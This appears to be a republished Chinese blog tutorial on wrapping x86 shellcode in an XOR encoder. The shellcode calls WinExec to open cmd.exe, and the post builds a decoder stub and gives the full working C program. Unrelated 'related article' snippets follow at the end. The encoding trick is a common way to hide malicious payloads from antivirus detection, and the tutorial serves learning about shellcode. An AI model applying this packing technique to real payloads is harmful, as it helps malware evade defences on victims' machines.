利用xor给shellcode加壳

首先看我们的shellcode,执行弹出cmd
没有shellcode:

#include "stdio.h"
#include "windows.h"
#include <string.h>
#include "stdlib.h"int main(int argc, char* argv[])
{printf("begin\n");HINSTANCE libHandle;char *dll="kernel32.dll";libHandle=LoadLibrary(dll);char *str="cmd.exe";__asm{mov eax,strpush 5				;5=SW_SHOWpush eaxmov eax,0x755bdab0	//call dword ptr [WinExec]call eax}return 0;}

将汇编改成shellcode,注意mov eax,0x755bdab0,后面0x755bdab0是WinExec函数的地址,每个机子可能不一样,请查看下自己机子这个函数的地址(将mov eax,0x755bdab0改成call dword ptr [WinExec],当执行call dword ptr [WinExec]时,查看eip的值就是WinExec的地址),不要用call dword ptr [WinExec],虽然也能弹出cmd,但是对后面有很大影响,我试了,解码后弹不出cmd(我也不知道为啥,我一开始就是用这个的,浪费我好长时间)。

#include "stdio.h"
#include "windows.h"
#include <string.h>
#include "stdlib.h"
char key=0x51;
char shellcode[]="\x8B\x45\xF4\x6A\x05\x50\xB8\xB0\xDA\x5B\x75\xFF\xD0";int main(int argc, char* argv[])
{printf("begin\n");HINSTANCE libHandle;char *dll="kernel32.dll";libHandle=LoadLibrary(dll);char *str="cmd.exe";__asm{lea eax,shellcodecall eax}return 0;
}

在这里插入图片描述
利用xor给shellcode加密,加密的程序为:

#include "stdio.h"
#include "windows.h"
#include <string.h>
#include "stdlib.h"
char key=0x51;
char shellcode[]="\x8B\x45\xF4\x6A\x05\x50\xB8\xB0\xDA\x5B\x75\xFF\xD0";unsigned char decodeShellCode[200];int main(int argc, char* argv[])
{printf("begin\n");HINSTANCE libHandle;char *dll="kernel32.dll";libHandle=LoadLibrary(dll);char *str="cmd.exe";int length=sizeof(shellcode)/sizeof(shellcode[0]);for (int i=0;i<length-1;i++){	printf("\\x%0.2x",shellcode[i]); decodeShellCode[i]=shellcode[i]^key;printf("\t");printf("\\x%0.2x",decodeShellCode[i]);printf("\n");}return 0;
}

在这里插入图片描述
将shellcode加密,然后输出来,后面的是加密后的shellcode,将后面的粘贴复制到一个数组里

char encodeSC[]="\xda\x14\xa5\x3b\x54\x01\xe9\xe1\x8b\x0a\x24\xae\x81";

将加密的shellcode加载到内存里,然后动态在内存里改回来

先解密要执行的代码,然后再跳到解密后哪里执行加载整个shellcode到内存,前面专门解密后面的部分,再执行,就是加载整个外壳代码到内存,前面专门解密后面的部分,再执行

解密的程序为:

	__asm{add eax,24mov ecx,13xor edx,edx
decode:mov bl,byte ptr ds:[eax+edx]xor bl,51hmov byte ptr ds:[eax+edx],blinc edxloop decode}

将这段程序反汇编,找出机器码
在这里插入图片描述程序中24是这段机器码的长度,13是我们的shellcode长度
将机器码放到我们加密的shellcode前面

char decodeSC[]="\x83\xC0\x18\xB9\x0d\x00\x00\x00\x33\xD2\x3E\x8A\x1C\x10\x80\xF3\x51\x3E\x88\x1C\x10\x42\xE2\xF2"
"\xda\x14\xa5\x3b\x54\x01\xe9\xe1\x8b\x0a\x24\xae\x81";

最终程序

#include "stdio.h"
#include "windows.h"
#include <string.h>
#include "stdlib.h"
char key=0x51;char decodeSC[]="\x83\xC0\x18\xB9\x0d\x00\x00\x00\x33\xD2\x3E\x8A\x1C\x10\x80\xF3\x51\x3E\x88\x1C\x10\x42\xE2\xF2"
"\xda\x14\xa5\x3b\x54\x01\xe9\xe1\x8b\x0a\x24\xae\x81";int main(int argc, char* argv[])
{printf("begin\n");HINSTANCE libHandle;char *dll="kernel32.dll";libHandle=LoadLibrary(dll);char *str="cmd.exe";__asm{lea eax,decodeSCpush eaxret	 }return 0;
}

在这里插入图片描述
思路:

  1. 找出我们要执行的shellcode
  2. 利用xor给shellcode加密成encodeShellcode
  3. 再写个汇编,用于解密encodeShellcode,再写汇编时,要注意这个汇编产生的机器码长度(mov eax,24,24就是这个汇编机器码的长度)
  4. 找出汇编的机器码,放在加密的shelcode前面
  5. 将数组地址赋给eax,push eax,ret

建议反汇编的时候,一步步执行,我们就能看到动态修改加密后的shellcode了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/380413.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

华为mate50鸿蒙,华为Mate50Pro首次曝光,5000mAh+鸿蒙OS+120Hz,太强

自从去年九月份以来&#xff0c;关于华为旗舰的消息越来越少了&#xff0c;主要的原因想必大家也是知道的。现在华为究竟还能不能继续正常发布新旗舰&#xff0c;答案也很微妙&#xff0c;不过我们可以肯定的是&#xff0c;华为绝不会放弃手机业务&#xff0c;这是余承东多次亲…

数数小木块

描述 在墙角堆放着一堆完全相同的正方体小木块&#xff0c;如下图所示&#xff1a; 因为木块堆得实在是太有规律了&#xff0c;你只要知道它的层数就可以计算所有木块的数量了。 现在请你写个程序 给你任一堆木块的层数&#xff0c;求出这堆木块的数量. 输入 第一行是一个整…

sql server 2000 以前的某个程序安装已在安装计算机上创建挂起的文件操作解

好久没弄VS了&#xff0c;今天因为要改客户的网站&#xff0c;又装起来VS2003&#xff0c;先要装一下MSSQL&#xff0c;忘了原先自己的电脑不能装MSSQL企业版&#xff0c;今天下了个企业版&#xff0c;才知道白下了&#xff0c;装不起来&#xff0c;后来又弄了个MSSQL ED 版&am…

HDOJ 1896 Stones 解题报告

题目分类&#xff1a;优先队列STL作者&#xff1a;ACShiryu做题时间&#xff1a;2011-7-18Stones Time Limit: 5000/3000 MS (Java/Others) Memory Limit: 65535/32768 K (Java/Others)Total Submission(s): 217 Accepted Submission(s): 107 Problem DescriptionBecause…

信息安全主动攻击和被动攻击_信息安全中的主动和被动攻击 网络安全

信息安全主动攻击和被动攻击安全攻击 (Security Attacks) The attack in cryptography means that our data or sent messages or any kind of information is accessed by some anonymous user without our permission. An attack simply means to alter, destroy, implant or…

小光棍数

描述 最近Topcoder的XD遇到了一个难题&#xff0c;倘若一个数的三次方的后三位是111&#xff0c;他把这样的数称为小光棍数。他已经知道了第一个小光棍数是471,471的三次方是104487111&#xff0c;现在他想知道第m&#xff08;m<10000000000&#xff09;个小光棍数是多少&a…

线性表---双链表

双链表是单链表的拓展&#xff0c;单链表结点中只有一个指向其后继的指针&#xff0c;双链表有两个结点&#xff0c;一个指向其后继的指针&#xff0c;另一个指向前驱。 为什么要引入双链表呢&#xff1f; 这就要说单链表只有一个指针了&#xff0c;使得单链表只能从结点依次顺…

ppt形状html,PPT如何才能高大上?“形状”在PPT有这些妙用

【PConline 技巧】在PPT中&#xff0c;形状的用法非常丰富。可以说一份优秀的PPT&#xff0c;随处都能见到形状的影子。今天我们就和大家分享几组形状的特殊用法。其实很多时候&#xff0c;你会发现形状有时并不仅仅是形状&#xff01;1.突出标题标题在PPT中的作用不言而喻&…

用随机整数填充缺失值_输入一个整数值并在C中用零填充进行打印

用随机整数填充缺失值Input an integer value and we have to pad the value by Zeros in C. 输入一个整数值&#xff0c;我们必须在C中用零填充该值。 Example: 例&#xff1a; Input:Enter an integer value: 12 Output: 2 digit padding: 123 digit padding: 0124 digit p…

二分图匹配----匈牙利算法之二

poj 1469 COURSES//题意:现在有p门课程和n个学生,现在需要有由p个学生组成的组织,该组织满足每个学生代表一门课程以及每门课程只能由一个学生代表,//现给出每门课程都有哪些学生可以参加,要求判断是否存在满足题意所需要的组织.//求解二分图的最大匹配数,如果与p相等就输出&qu…

FileSystemObject简介及应用

提示:刚一开始看到有这样的功能&#xff0c;我也受骗了&#xff0c;以为真的可以通过浏览器在访问者的硬盘上创建文件&#xff0c;因为我开始试了一下真的可以&#xff0c;不信你把下面这段代码COPY到一个HTML文件当中再运行一下&#xff01; <script language"JavaScr…

C——画图

描述 计算机画图也挺有趣的哈&#xff01;那我们就来用计算机画幅图吧。。。 输入 输入一个正整数N&#xff08;0< N<10&#xff09;&#xff0c;表示要输出的正方形的边上*的个数 输出 输出一个满足题意的正方形 样例输入 4 样例输出 **** **** **** **** …

线性表----循环链表和静态链表

1、循环链表 1.1 循环单链表 循环单链表和单链表的区别在于&#xff0c;表中最后一个结点指针不在是null&#xff0c;而是头指针&#xff0c;从而使整个链表形成一个环 此时判断单链表是否为空&#xff0c;条件就是头结点的指针是否等于头指针此时单链表相当于一个环&#…

html下拉框选中第二个,html通过点击第一个select改变第二关select的内容

地址联动select {width: 100px;padding: 5px;font-size:16px;}选择地址//定义省市的信息var provList [‘江苏‘,‘浙江‘,‘福建‘,‘湖南‘];var cityList [];cityList[0] [‘南京‘, ‘苏州‘, ‘宿迁‘, ‘扬州‘];cityList[1] [‘杭州‘, ‘温州‘, ‘宁波‘, ‘台州‘…

关于Asp.Net开发中导入外部JavaScript文件的问题

一直认为在html元素应用的时候&#xff0c;每个元素大都这样子(<hr />或者<script />)格式就对的&#xff0c;但今天就发现了&#xff0c;其实在不同的开发中是不一样的&#xff0c;这次遇到的就是导入外部Js文件的问题。之前我是如此写的&#xff1a; <script …

n个节点的二叉树n+1_使用C ++程序将链接列表中的最后N个节点附加到第一个

n个节点的二叉树n1Given a linked list and an integer n, append the last n elements of the LL to front. Assume given n will be smaller than length of LL. 给定一个链表和一个整数n&#xff0c;将LL的最后n个元素附加到前面。 假设给定的n将小于LL的长度。 Input form…

生活更多仓桑。

吃完房&#xff0c;到了房间&#xff0c;又把音乐开的最大声。听听一些呐感不平&#xff0c;可以发泄情感的歌。 现在听的是《浪人情歌》&#xff0c;不要再承受&#xff0c;要把你忘记。这些年来&#xff0c;自已为了她真的是付出了很多&#xff0c;但结果还是这样&#xf…

利用kali的msf提取汇编机器码(shellcode)

对于提取小段汇编的机器码&#xff0c;kali的msf提取汇编机器码非常方便 比如提取下面小段的汇编机器码 push 5 ;5SW_SHOWpush eaxmov eax,0x755bdab0call eax首先输入 msf-nasm_shell //注意msf和-之间没有空格然后依次输入命令 将上面内容复制到一个文本编辑器里&#x…

A+B Problem(V)

描述 做了AB Problem之后&#xff0c;Yougth感觉太简单了&#xff0c;于是他想让你求出两个数反转后相加的值。帮帮他吧 输入 有多组测试数据。每组包括两个数m和n&#xff0c;数据保证int范围&#xff0c;当m和n同时为0是表示输入结束。 输出 输出反转后相加的结果。 样…

Java中interrupted()和isInterrupted()之间的区别

Java中的interrupted()和isInterrupted() (interrupted() and isInterrupted() in Java) Here, we will see how isInterrupted() differs from interrupted() in Java? 在这里&#xff0c;我们将看到isInterrupted()与Java中的interrupted()有何不同&#xff1f; isInterrup…